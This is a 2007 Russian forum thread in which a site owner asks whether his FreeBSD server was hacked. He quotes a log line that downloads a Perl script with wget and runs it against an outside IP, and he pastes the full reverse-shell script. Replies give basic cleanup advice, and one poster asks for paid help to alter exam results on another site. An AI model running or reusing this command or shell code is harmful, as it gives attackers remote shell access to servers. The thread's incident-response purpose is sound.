Мой сайт взломали?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Мой сайт взломали? - 2007-04-25 14:01:45.483333
|
|
|
alexhl
Сообщений: 4
Оценки: 0
Присоединился: 2007-04-25 13:56:23.946666
|
Здравствуйте,
нашел на своем веб сервере в логах вот такую строчку:
cd /var/tmp;wget geocities.com/mozi2weed/dc;perl dc 209.123.50.136 3303;echo BLACKART
Скажите, мой сервер взломали?
Ваше мнение, что мне нужно сделать впервую очередь?
(грамотного админа на freebsd у меня нет, так что приходится расчитывать только на вашу помощь :) )
по данному адресу находится скрипт:
#!/usr/bin/perl
use Socket;
print "Hai cu mata ca o sa ai un server\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Ma pis pa el root\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Sloboz...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Hopa tinere\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Si hai cu mata!rupel\n\n";
print "[semnat] mozi\n\n";
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 14:51:34.786666
|
|
|
system.d
Сообщений: 281
Оценки: 0
Присоединился: 2007-03-26 17:47:28.133333
|
похоже на перловый сплоент
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 16:06:12.203333
|
|
|
Paganini
Сообщений: 204
Оценки: 0
Присоединился: 2007-03-03 22:25:24.340000
|
Обычный биндшелл
ps -ax > смотри како pid у него и убивай
потом netstat -an и смотри если еще какая-нить лажа в системе
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 17:02:54.150000
|
|
|
alexhl
Сообщений: 4
Оценки: 0
Присоединился: 2007-04-25 13:56:23.946666
|
Может помочь смена всех паролей?
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 17:14:50.443333
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
quote:
Может помочь смена всех паролей?
Помочь не поможет, но сменить не помешает.
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 17:24:14.530000
|
|
|
alexhl
Сообщений: 4
Оценки: 0
Присоединился: 2007-04-25 13:56:23.946666
|
Ваше мнение (чисто на вскидку).
Какая вероятность того что злоумышленник проник на сервер через дырявые скипты?
На сервере включены "волшебные кавычки" + практически сведены на нет xss атаки (система кстати на битрексе, правда есть еще много самописного кода)
сам сервер Freebsd 4.11.
Куда бросаться, что закрывать, ведь зная ошибку, злоумышеллнник наверное воспользуется ей снова?
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 17:27:36.780000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Судя по всему логов Вы не ведете и папка /var/log Вам не знакома? ;), а то что через скрипты - так это 90%
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 17:30:57.410000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
quote:
….практически сведены на нет xss атаки
..это не значит, что полностью. И совет - заведите себе системного администратора!
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 18:22:03.040000
|
|
|
alexhl
Сообщений: 4
Оценки: 0
Присоединился: 2007-04-25 13:56:23.946666
|
Раз уж заведен такой разговор, то какие права должны быть на папку upload?
и на другие папки?
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-25 19:22:22.870000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Объяснять не стану, прочти ЗДЕСЬ, если что-то будет не понятно, пости;)
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-26 00:01:44.380000
|
|
|
ifeeling
Сообщений: 1
Оценки: 0
Присоединился: 2007-04-25 23:46:09.353333
|
Чуваки такая пробемка! нужно сайт взломать http://results.rustest.ru/ivcct/
там прописать Карнаух Григорий Александрович 9404 480818 Удмуртия. нужно поставить 36 баллов очень нужно.Поддержу средствами если нужно.Буду очень сильно благодарен.ася. 330882571
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-26 14:49:19.953333
|
|
|
XXpXX
Сообщений: 176
Оценки: 0
Присоединился: 2007-01-13 22:32:42.970000
|
C чего ты взял что тебя взломали???
|
|
|
|
|
RE: Мой сайт взломали? - 2007-04-26 19:28:45.030000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
quote:
Чуваки такая пробемка! нужно сайт взломать http://results.rustest.ru/ivcct/
там прописать Карнаух Григорий Александрович 9404 480818 Удмуртия. нужно поставить 36 баллов очень нужно.Поддержу средствами если нужно.Буду очень сильно благодарен.ася. 330882571
Чувак, иДитЫнАхЕр!!!!
|
|
|
|
|
RE: Мой сайт взломали? - 2007-05-03 17:15:57.823333
|
|
|
Fluffy_
Сообщений: 4
Оценки: 0
Присоединился: 2007-04-19 03:24:35.566666
|
quote:
print "Hai cu mata ca o sa ai un server\n\n";
print "[/] Ma pis pa el root\n";
print "[/] Sloboz…\n";
print "[/] Hopa tinere\n";
print "[/] Si hai cu mata!rupel\n\n";print "[semnat] mozi\n\n";
Перевод с Румынскова языка.
print "Иди с матерю будешь иметь сервер\n\n";
print "[/] Писать на него root \n";
print "[/] Свабода…\n";
print "[/] ооопа маладой\n";
print "[/]Что иди с матерю!Порви его\n\n";print "[Подпись] мози\n\n"; Знаю. Смысла нет. Я тоже его не вижу. Это прямой перевод.
|
|
|
|
|
|
